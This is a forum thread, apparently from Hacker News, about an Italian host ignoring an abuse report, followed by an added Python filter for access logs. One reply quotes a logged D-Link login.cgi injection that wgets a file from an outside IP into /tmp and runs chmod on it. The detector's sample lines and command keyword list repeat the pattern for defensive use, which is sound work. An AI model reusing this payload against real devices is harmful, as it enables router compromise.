Aruba.it blind to malicious code hosting
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers: http://80.211.112.150/k
(Reverse DNS resolves to their domain)
Their reaction?
1. In the chat they redirect me to the dedicated hosting support form ("only way to do it").
2. Dedicated hosting support just closes my ticket.

Wow! I got this too (amongst other hosts).

nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"

Apparently targeting D-Link routers - https://twitter.com/txalin/status/1007625620090707974?lang=e...

You are dealing with customer support for some Aruba customer, i.e. not you. Why don't you contact police or the site owner instead?

If it's a hacked server, the owner has to notice the hack and ask for help cleaning up if necessary. You have no authority whatsoever, and if you attempt to stir up trouble about someone's web site, closing tickets is at the polite end of the response spectrum. You risk prosecution.

If it's a brazen criminal using their own host, they are the customer and the site is working as expected. No customer support required.

Errr... reading your points I presume you've never really done that (notifying a service provider).

> Why don't you contact police or the site owner instead?

Police? Seriously? My police here in Germany or the Italian police? What do you think will happen? Right: nothing.

Site owner? If you can tell me the site owner from an IP... I will do that.

> You risk prosecution.

By telling a service provider that they host malicious content and should do sth. about it? Now that's an interesting view.

> If it's a brazen criminal using their own host [...] No customer support required.

The customer support was the only way to contact the provider. It doesn't matter if they are housing or hosting malicious content. They are at least partly responsible, especially if someone is telling them.

You are trying to intimidate a provider into messing with someone else's site, which amounts to hacking or worse.

There's basically nothing you can do besides notify their abuse desk and probably get ignored, because abuse desks pay little attention to one-off complaints like that. If they do get taken down, it'll be by one of the larger security companies who detect the page (for example, if that IP sends spam) and include it in their feed of bad IPs to aruba.
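
An added example, not part of the thread or written by any of its participants: a small Python filter that finds requests like the nginx log line quoted above in an access log and groups them by the download URL they reference, which is the evidence an abuse desk would need. The command keyword list, the function names, and the second and third sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# nginx combined-format fields; search() tolerates a "nginx_1 | " compose prefix.
LOG_RE = re.compile(
    r'(?P<src>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# Shell separator directly followed by a download/permission command.
# "&" is left out on purpose: it is a normal query-string delimiter.
INJECT_RE = re.compile(r'(?:[;|`]|\$\()\s*(?:wget|curl|tftp|chmod|busybox)\b')
URL_RE = re.compile(r'https?://[^\s;\'"|`]+')

SAMPLE_LOG = [
    # Line quoted in the thread (already truncated there with "...").
    'nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"',
    # Constructed: same pattern with the separator percent-encoded (documentation IPs).
    'nginx_1 | 203.0.113.5 - - [30/Aug/2018:15:02:10 +0000] "GET /login.cgi?cli=x%27%3Bwget%20http://198.51.100.7/a%20-O%20/tmp/a HTTP/1.1" 404 153 "-" "-" "-"',
    # Constructed: benign request to the same path.
    'nginx_1 | 192.0.2.10 - - [30/Aug/2018:14:52:01 +0000] "GET /login.cgi?user=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
]

def suspicious_requests(lines):
    """Return one record per request whose decoded target chains a shell command."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        decoded = unquote(m["target"])  # match on the decoded form, not the raw bytes
        if not INJECT_RE.search(decoded):
            continue
        findings.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                         "staging_urls": URL_RE.findall(decoded)})
    return findings

def group_by_staging_url(findings):
    """Map each referenced download URL to the (timestamp, source, status) hits."""
    grouped = defaultdict(list)
    for f in findings:
        for url in f["staging_urls"]:
            grouped[url].append((f["ts"], f["src"], f["status"]))
    return dict(grouped)

if __name__ == "__main__":
    for url, hits in group_by_staging_url(suspicious_requests(SAMPLE_LOG)).items():
        print(url)
        for ts, src, status in hits:
            print(f"  {ts}  from {src}  -> HTTP {status}")
```

The status code in each hit shows whether the server rejected the request (400 in the quoted line); the source address is the scanning host, while the grouped URL is the hosting location a report would name.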